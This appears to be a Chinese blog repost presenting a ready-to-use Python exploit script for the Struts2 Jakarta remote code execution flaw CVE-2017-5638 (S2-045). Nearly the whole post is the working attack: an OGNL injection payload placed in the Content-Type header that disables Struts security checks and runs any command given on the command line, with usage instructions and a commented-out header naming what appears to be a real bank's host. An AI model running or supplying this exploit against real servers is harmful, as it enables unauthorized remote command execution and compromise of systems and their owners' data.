Struts2 Jakarta远程执行代码测试

本文介绍了一个针对 Struts2 Jakarta 远程代码执行漏洞 (CVE-2017-5638) 的 Python 利用脚本。该脚本通过特定的 payload 向易受攻击的 Struts2 服务器发送请求,以执行任意命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#coding:utf8
#author:Gru-HT
#time:下午4:30 07 03 2017
#information:struts2 Jakarta远程执行 cve-2017-5638 S02-45


import requests,sys
def st245(urls,ossystem):
    payload="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+ossystem+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    head={
        #"Host":'easyfee.esunbank.com.tw',
        "User-Agent":"User-Agent=Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
        "Accept":"Accept=*/*",
        "Accept-Language":"Accept-Language=en-US,en;q=0.5",
        "Content-Type":payload,
        "Connection":"keep-alive"
    }
    attack=requests.get(urls,headers=head)
    print attack.text

if __name__=='__main__':
    try:
        url=sys.argv[1]
        ossystems=sys.argv[2]
        st245(url,ossystems)
    except:
        print u"请检查测试语法是否正确,格式为:测试脚本 目标地址 系统命令\n举个栗子:st2-045.py 'http://a.a.a/n.action' whoami"

 

转载于:https://my.oschina.net/403/blog/853757

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值